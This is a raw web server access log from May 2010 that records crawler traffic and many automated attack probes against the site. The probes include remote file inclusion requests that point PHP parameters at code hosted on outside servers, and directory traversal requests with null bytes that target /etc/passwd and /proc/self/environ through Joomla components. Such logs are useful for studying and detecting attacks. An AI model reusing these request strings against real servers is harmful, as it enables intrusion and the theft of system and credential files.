218.38.34.19 - - [02/May/2010:08:55:00 -0500] "GET /logs//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 3998 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:55:00 -0500] "GET /logs/access_log.1263081600//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:55:00 -0500] "GET //?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:08:56:41 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
218.38.34.19 - - [02/May/2010:08:59:08 -0500] "GET /logs/access_log.1263859200//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.119 - - [02/May/2010:09:00:32 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [02/May/2010:09:00:32 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.100.128.142 - - [02/May/2010:09:01:17 -0500] "HEAD /tattoo/tattoo1.htm HTTP/1.1" 200 0 "-""Xenu Link Sleuth 1.3.5"
121.88.4.141 - - [02/May/2010:09:04:06 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:09:04:09 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:09:04:11 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
216.129.119.42 - - [02/May/2010:09:09:51 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.93 - - [02/May/2010:09:11:24 -0500] "GET /logs/access_log.1212192000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.166 - - [02/May/2010:09:11:27 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
189.108.172.26 - - [02/May/2010:09:12:40 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:09:12:41 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:09:12:41 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:09:18:41 -0500] "GET /logs/access_log.1246924800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.165 - - [02/May/2010:09:19:03 -0500] "GET /logs/access_log.1218412800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
202.72.242.242 - - [02/May/2010:09:19:53 -0500] "GET //poll/poll_ssi.php?include_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:09:19:53 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:09:19:53 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:09:19:57 -0500] "GET /logs/access_log.1270684800%20%20//poll/poll_ssi.php?include_path=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.249.71.36 - - [02/May/2010:09:23:48 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.89 - - [02/May/2010:09:26:54 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
99.39.2.249 - - [02/May/2010:09:37:39 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
87.250.255.243 - - [02/May/2010:09:38:07 -0500] "GET /logs/access_log.1254700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
99.39.2.249 - - [02/May/2010:09:38:25 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
207.46.199.191 - - [02/May/2010:09:39:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:09:39:51 -0500] "GET /logs/access_log.1156032000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.45.185.178 - - [02/May/2010:09:42:13 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:42:13 -0500] "GET //admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:42:13 -0500] "GET /logs//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
99.39.2.249 - - [02/May/2010:09:42:22 -0500] "GET //index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:09:42:22 -0500] "GET //index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.45.185.178 - - [02/May/2010:09:42:34 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:44:18 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:44:18 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:44:18 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:45:24 -0500] "GET //admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:45:24 -0500] "GET /logs//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:45:24 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.45.185.178 - - [02/May/2010:09:45:24 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://christenplein.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.192 - - [02/May/2010:09:45:54 -0500] "GET /logs/access_log.1254182400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [02/May/2010:09:45:55 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:45:55 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:45:55 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.174.185.131 - - [02/May/2010:09:48:43 -0500] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 471 "-""Mozilla/5.0"
211.174.185.131 - - [02/May/2010:09:48:43 -0500] "GET /logs/access_log.1270598400%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 495 "-""Mozilla/5.0"
211.174.185.131 - - [02/May/2010:09:48:43 -0500] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:09:50:31 -0500] "GET /logs/access_log.1178150400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [02/May/2010:09:53:57 -0500] "GET /head.php?path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:53:57 -0500] "GET /logs/head.php?path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:09:53:57 -0500] "GET /logs/access_log.1270598400%20%20/head.php?path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.96 - - [02/May/2010:09:54:25 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.36 - - [02/May/2010:09:54:34 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.141 - - [02/May/2010:09:57:55 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.84.75.16 - - [02/May/2010:09:58:06 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "http://www.bing.com/search?q=http%3A%2F%2Fimages.google.co.th%2Fimglanding%3Fq%3Dvintage&form=QBRE&filt=all""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
115.84.75.16 - - [02/May/2010:09:58:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
81.89.97.190 - - [02/May/2010:10:01:15 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
81.89.97.190 - - [02/May/2010:10:01:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.89.97.190 - - [02/May/2010:10:01:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://195.130.126.109/SQLiteManager/ide.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.250.255.243 - - [02/May/2010:10:01:52 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.167.65.30 - - [02/May/2010:10:02:22 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:22 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:22 -0500] "GET /logs/access_log.1270512000%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:22 -0500] "GET /logs/access_log.1222473600%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:24 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:24 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:24 -0500] "GET /logs/access_log.1222473600%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:02:24 -0500] "GET /logs/access_log.1270512000%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:02:51 -0500] "GET //index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:02:54 -0500] "GET /logs//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:02:55 -0500] "GET /logs/access_log.1265241600//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:03:01 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:03:01 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:03:01 -0500] "GET /logs/access_log.1213833600%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:06 -0500] "GET //index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:06 -0500] "GET /logs/access_log.1265241600//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:06 -0500] "GET /logs//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:10:03:09 -0500] "GET /logs/access_log.1229731200%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:13 -0500] "GET //index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:13 -0500] "GET /logs/access_log.1265241600//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:13 -0500] "GET /logs//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:18 -0500] "GET /logs/access_log.1265241600//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:18 -0500] "GET /logs//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:03:18 -0500] "GET //index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:04:26 -0500] "GET /logs/access_log.1227916800//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:04:31 -0500] "GET /logs/access_log.1227916800//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:04:37 -0500] "GET /logs/access_log.1227916800//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [02/May/2010:10:04:50 -0500] "GET /logs/access_log.1227916800//index.php?option=com_pcchess&controller=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.43 - - [02/May/2010:10:07:24 -0500] "GET /logs/access_log.1261785600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:10:08:18 -0500] "GET /logs/access_log.1198713600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.131 - - [02/May/2010:10:10:54 -0500] "GET /logs/access_log.1210982400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
99.39.2.249 - - [02/May/2010:10:11:00 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:11:00 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:11:01 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:11:18 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:11:18 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:11:18 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
207.46.13.92 - - [02/May/2010:10:11:54 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.87 - - [02/May/2010:10:12:55 -0500] "GET /logs/access_log.1208822400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.54 - - [02/May/2010:10:13:24 -0500] "GET /logs/access_log.1178668800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.92 - - [02/May/2010:10:19:24 -0500] "GET /logs/access_log.1188000000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
99.39.2.249 - - [02/May/2010:10:19:58 -0500] "GET /logs/access_log.1268611200//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:19:58 -0500] "GET //index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:19:58 -0500] "GET /logs//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:19:58 -0500] "GET /logs/access_log.1268611200//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:19:58 -0500] "GET //index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:19:59 -0500] "GET /logs//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:20:27 -0500] "GET /logs/access_log.1270598400//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:10:20:29 -0500] "GET /logs/access_log.1270598400//index.php?option=com_facileforms&facileforms=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
121.88.4.141 - - [02/May/2010:10:21:16 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:21:16 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:21:17 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.250.255.243 - - [02/May/2010:10:21:27 -0500] "GET /logs/access_log.1247529600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [02/May/2010:10:22:06 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:22:07 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:22:07 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:22:18 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:22:19 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:22:19 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
121.88.4.141 - - [02/May/2010:10:23:02 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.88.4.141 - - [02/May/2010:10:23:02 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.88.4.141 - - [02/May/2010:10:23:02 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
121.88.4.141 - - [02/May/2010:10:23:05 -0500] "GET /logs/access_log.1263254400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.39.130.176 - - [02/May/2010:10:23:56 -0500] "GET /logs/access_log.1268956800/siakad.html?id=com_simpleboard=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
211.39.130.176 - - [02/May/2010:10:23:57 -0500] "GET /siakad.html?id=com_simpleboard=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
211.39.130.176 - - [02/May/2010:10:23:57 -0500] "GET /logs/siakad.html?id=com_simpleboard=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
67.195.112.180 - - [02/May/2010:10:28:31 -0500] "GET /logs/access_log.1178496000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.40 - - [02/May/2010:10:36:55 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.73.226.225 - - [02/May/2010:10:39:10 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.39.130.176 - - [02/May/2010:10:43:55 -0500] "GET /logs/access_log.1219968000/siakad.html?id=com_simpleboard=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
87.250.255.243 - - [02/May/2010:10:49:19 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
